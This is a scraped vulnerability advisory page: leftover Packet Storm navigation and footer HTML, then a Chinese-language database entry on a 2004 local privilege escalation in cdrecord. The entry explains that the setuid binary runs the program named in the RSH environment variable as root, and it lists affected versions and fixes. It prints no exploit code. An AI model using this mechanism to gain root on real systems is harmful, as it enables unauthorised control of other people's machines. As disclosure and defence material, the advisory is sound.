<div id="mn-tag-file"><h2>File Tags</h2><ul><li><a href="/files/tags/activex/">ActiveX</a> <span>(873)</span></li><li><a href="/files/tags/advisory/">Advisory</a> <span>(55,748)</span></li><li><a href="/files/tags/arbitrary/">Arbitrary</a> <span>(8,747)</span></li><li><a href="/files/tags/bbs/">BBS</a> <span>(2,859)</span></li><li><a href="/files/tags/bypass/">Bypass</a> <span>(575)</span></li><li><a href="/files/tags/cgi/">CGI</a> <span>(847)</span></li><li><a href="/files/tags/code_execution/">Code Execution</a> <span>(3,370)</span></li><li><a href="/files/tags/cracker/">Cracker</a> <span>(685)</span></li><li><a href="/files/tags/csrf/">CSRF</a> <span>(1,857)</span></li><li><a href="/files/tags/denial_of_service/">DoS</a> <span>(14,917)</span></li><li><a href="/files/tags/encryption/">Encryption</a> <span>(2,115)</span></li><li><a href="/files/tags/exploit/">Exploit</a> <span>(29,367)</span></li><li><a href="/files/tags/file_inclusion/">File Inclusion</a> <span>(3,386)</span></li><li><a href="/files/tags/firewall/">Firewall</a> <span>(748)</span></li><li><a href="/files/tags/info_disclosure/">Info Disclosure</a> <span>(1,212)</span></li><li><a href="/files/tags/intrusion_detection/">Intrusion Detection</a> <span>(663)</span></li><li><a href="/files/tags/java/">Java</a> <span>(1,320)</span></li><li><a href="/files/tags/javascript/">JavaScript</a> <span>(503)</span></li><li><a href="/files/tags/kernel/">Kernel</a> <span>(2,825)</span></li><li><a href="/files/tags/local/">Local</a> <span>(10,570)</span></li><li><a href="/files/tags/magazine/">Magazine</a> <span>(503)</span></li><li><a href="/files/tags/overflow/">Overflow</a> <span>(8,311)</span></li><li><a href="/files/tags/perl/">Perl</a> <span>(1,213)</span></li><li><a href="/files/tags/php/">PHP</a> <span>(3,984)</span></li><li><a href="/files/tags/proof_of_concept/">Proof of Concept</a> <span>(1,589)</span></li><li><a href="/files/tags/protocol/">Protocol</a> <span>(1,839)</span></li><li><a href="/files/tags/python/">Python</a> <span>(705)</span></li><li><a href="/files/tags/remote/">Remote</a> <span>(19,367)</span></li><li><a href="/files/tags/root/">Root</a> <span>(2,443)</span></li><li><a href="/files/tags/scanner/">Scanner</a> <span>(1,317)</span></li><li><a href="/files/tags/tool/">Security Tool</a> <span>(5,638)</span></li><li><a href="/files/tags/shell/">Shell</a> <span>(1,943)</span></li><li><a href="/files/tags/shellcode/">Shellcode</a> <span>(772)</span></li><li><a href="/files/tags/sniffer/">Sniffer</a> <span>(781)</span></li><li><a href="/files/tags/spoof/">Spoof</a> <span>(1,653)</span></li><li><a href="/files/tags/sql_injection/">SQL Injection</a> <span>(12,575)</span></li><li><a href="/files/tags/tcp/">TCP</a> <span>(1,961)</span></li><li><a href="/files/tags/trojan/">Trojan</a> <span>(541)</span></li><li><a href="/files/tags/udp/">UDP</a> <span>(713)</span></li><li><a href="/files/tags/virus/">Virus</a> <span>(573)</span></li><li><a href="/files/tags/vulnerability/">Vulnerability</a> <span>(22,058)</span></li><li><a href="/files/tags/web/">Web</a> <span>(5,497)</span></li><li><a href="/files/tags/paper/">Whitepaper</a> <span>(2,850)</span></li><li><a href="/files/tags/x86/">x86</a> <span>(585)</span></li><li><a href="/files/tags/xss/">XSS</a> <span>(12,267)</span></li><li><a href="/files/tags/">Other</a></li></ul></div><div id="mn-arch-file"><h2>File Archives</h2><ul><li><a href="/files/date/2013-04/">April 2013</a></li><li><a href="/files/date/2013-03/">March 2013</a></li><li><a href="/files/date/2013-02/">February 2013</a></li><li><a href="/files/date/2013-01/">January 2013</a></li><li><a href="/files/date/2012-12/">December 2012</a></li><li><a href="/files/date/2012-11/">November 2012</a></li><li><a href="/files/date/2012-10/">October 2012</a></li><li><a href="/files/date/2012-09/">September 2012</a></li><li><a href="/files/date/2012-08/">August 2012</a></li><li><a href="/files/date/2012-07/">July 2012</a></li><li><a href="/files/date/2012-06/">June 2012</a></li><li><a href="/files/date/2012-05/">May 2012</a></li><li><a href="/files/date/">Older</a></li></ul></div><div id="mn-os-file"><h2>Systems</h2><ul><li><a href="/files/os/aix/">AIX</a> <span>(371)</span></li><li><a href="/files/os/apple/">Apple</a> <span>(1,067)</span></li><li><a href="/files/os/bsd/">BSD</a> <span>(305)</span></li><li><a href="/files/os/cisco/">Cisco</a> <span>(1,393)</span></li><li><a href="/files/os/debian/">Debian</a> <span>(4,133)</span></li><li><a href="/files/os/fedora/">Fedora</a> <span>(1,663)</span></li><li><a href="/files/os/freebsd/">FreeBSD</a> <span>(1,053)</span></li><li><a href="/files/os/gentoo/">Gentoo</a> <span>(2,646)</span></li><li><a href="/files/os/hpux/">HPUX</a> <span>(735)</span></li><li><a href="/files/os/iphone/">iPhone</a> <span>(99)</span></li><li><a href="/files/os/irix/">IRIX</a> <span>(218)</span></li><li><a href="/files/os/juniper/">Juniper</a> <span>(63)</span></li><li><a href="/files/os/linux/">Linux</a> <span>(23,246)</span></li><li><a href="/files/os/osx/">Mac OS X</a> <span>(453)</span></li><li><a href="/files/os/mandriva/">Mandriva</a> <span>(2,472)</span></li><li><a href="/files/os/netbsd/">NetBSD</a> <span>(244)</span></li><li><a href="/files/os/openbsd/">OpenBSD</a> <span>(422)</span></li><li><a href="/files/os/redhat/">RedHat</a> <span>(3,170)</span></li><li><a href="/files/os/slackware/">Slackware</a> <span>(447)</span></li><li><a href="/files/os/solaris/">Solaris</a> <span>(1,524)</span></li><li><a href="/files/os/suse/">SUSE</a> <span>(1,440)</span></li><li><a href="/files/os/ubuntu/">Ubuntu</a> <span>(3,312)</span></li><li><a href="/files/os/unix/">UNIX</a> <span>(7,126)</span></li><li><a href="/files/os/unixware/">UnixWare</a> <span>(152)</span></li><li><a href="/files/os/windows/">Windows</a> <span>(4,233)</span></li><li><a href="/files/os/">Other</a></li></ul></div>
      </div>

  </div>

</div>

<div id="f">
  <div id="fc">

    <div class="f-box" style="margin: 50px 0 0 0;">
        <a href="/"><img src="http://packetstatic.com/img1353978071/ps_logo.png" width="218" alt="packet storm" /></a>
    <p class="copy">© 2013 Packet Storm. All rights reserved.</p>
    </div>

    <div class="f-box">
    <dl>
      <dt>Site Links</dt>
      <dd><a href="/news/date/">News by Month</a></dd>
      <dd><a href="/news/tags/">News Tags</a></dd>
      <dd><a href="/files/date/">Files by Month</a></dd>
      <dd><a href="/files/tags/">File Tags</a></dd>
      <dd><a href="/files/directory/">File Directory</a></dd>
    </dl>    
    </div>

    <div class="f-box">
    <dl>
      <dt>About Us</dt>
      <dd><a href="/about/">History & Purpose</a></dd>
      <dd><a href="/contact/">Contact Information</a></dd>
      <dd><a href="/legal/tos.html">Terms of Service</a></dd>
      <dd><a href="/legal/privacy.html">Privacy Statement</a></dd>
      <dd><a href="/legal/copyright.html">Copyright Information</a></dd>
    </dl>
    </div>

    <div class="f-box">
	<dl>
      <dt>Services</dt>
      <dd><a href="/services/">Security Services</a></dd>
      <dt style="margin-top:1.5em;">Hosting By</dt>
      <dd><a href="http://www.rokabear.com/">Rokabear</a></dd>
      <dd><a href="/mirrors/">Global Mirror List</a></dd>
    </dl>   
    </div>
    <div class="f-box">
    <ul class="f-follow">
     <li><a href="https://twitter.com/packet_storm"><img width="24" height="24" alt="Follow on Twitter" src="http://packetstatic.com/img1353978071/s_twitter.png" /> Follow us on Twitter</a></li>
     <li><a href="https://www.facebook.com/packetstormfeed"><img width="24" height="24" alt="Follow on Facebook" src="http://packetstatic.com/img1353978071/s_facebook.png" /> Follow us on Facebook</a></li>
     <li><a href="/feeds"><img width="24" height="24" alt="View RSS Feeds" src="http://packetstatic.com/img1353978071/s_rss.png" /> Subscribe to an RSS Feed</a></li>
    </ul>
    </div>

  </div>
</div>

<div id="o-box"><img src="http://packetstatic.com/img1353978071/o_close.png" alt="close" height="30" width="30" id="o-close" /><div id="o-main"></div></div>


<script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-18885198-1']); _gaq.push(['_setDomainName', '.packetstormsecurity.com']); _gaq.push(['_trackPageview']); (function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})(); </script><noscript><img src="http://www.google-analytics.com/__utm.gif?utmwv=1.3&utmn=1098380344&utmcs=ISO-8859-1&utmsr=31337x31337&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmcn=1&utmdt=MDKSA-2004%3A091.txt%u2248%20Packet%20Storm&utmhn=packetstormsecurity.com&utmr=-&utmp=%2Ffiles%2F34303%2F&utmac=UA-18885198-1&utmcc=__utma%3D32867617.1098380344.1366881288.1366881288.1366881288.1%3B%2B__utmz%3D32867617.1366881288.1.1.utmccn%3D(direct)%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)" width="2" height="2" alt="" /></noscript>
<!-- Thu, 25 Apr 2013 09:14:46 GMT -->
</body>
</html>
    

- 漏洞信息

9779
cdrecord RSH Environment Variable Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

CDRTools' cdrecord is vulnerable to an RSH environment variable local privilege escalation vulnerability. This issue is due to cdrecord not dropping privileges before executing a program specified by the user via the "RSH" environment variable. Due to cdrecord being generally installed suid root, an attacker may leverage this behavior to gain superuser privileges on a system running the affected software.

- 时间线

2004-08-31 2004-08-31
2004-09-09 Unknow

- 解决方案

Upgrade to version 2.01.x or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): -Remove the suid bit from the cdrecord binary.

- 相关参考

- 漏洞作者

- 漏洞信息

CDRTools RSH Environment Variable Privilege Escalation Vulnerability
Access Validation Error 11075
No Yes
2004-08-31 12:00:00 2009-07-12 05:56:00
Max Vozeler is credited with the discovery of this issue.

- 受影响的程序版本

SGI ProPack 3.0 SP6
SCO Unixware 7.1.4
RedHat Linux 9.0 i386
Gentoo Linux 1.4
CDRTools CDRTools 2.0.3
CDRTools CDRTools 2.0.1 a18
CDRTools CDRTools 2.0.1
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.2 x86_64
+ Mandriva Linux Mandrake 10.2
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
CDRTools CDRTools 2.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32

- 漏洞讨论

CDRTools is reportedly vulnerable to an RSH environment variable privilege-escalation vulnerability. This issue is due to the application's failure to properly implement security controls when executing an application specified by the RSH environment variable.

An attacker may leverage this issue to gain superuser privileges on a computer running the affected software.

- 漏洞利用

No exploit is required to leverage this issue. Proof-of-concept examples have been provided by newbug Tseng &lt;newbug@chroot.org&gt; and I)ruid [CAU].

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案



Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

Please see the referenced advisories for more information and fixes.


CDRTools CDRTools 2.0.1

SCO Unixware 7.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站